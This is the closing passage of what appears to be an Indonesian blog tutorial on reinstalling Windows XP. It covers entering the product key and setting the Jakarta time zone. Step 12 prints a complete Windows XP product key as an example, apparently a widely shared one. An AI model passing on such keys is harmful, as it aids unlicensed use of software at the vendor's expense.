  12. Biarkan proses berjalan hingga muncul permintaan kode sandi/Product key/Password (contohnya untuk XP2 : XP8BF-X8HPF-PY6BX-K24PJ-TWT6M)
  13. Teruskan Settingan selanjutnya sesuai dengan kebutuhan kita, Untuk setting waktu pilih +07 Untuk waktu Kota Jakarta dsb.

Selamat Menginstall Ulang komputer anda sendiri.
Jiwa yang kuat itu adalah jiwa yang berdiri sendiri tanpa pengaruh orang lain...

--Semoga Sukses--

Share

Twitter Delicious Facebook Digg Stumbleupon Favorites More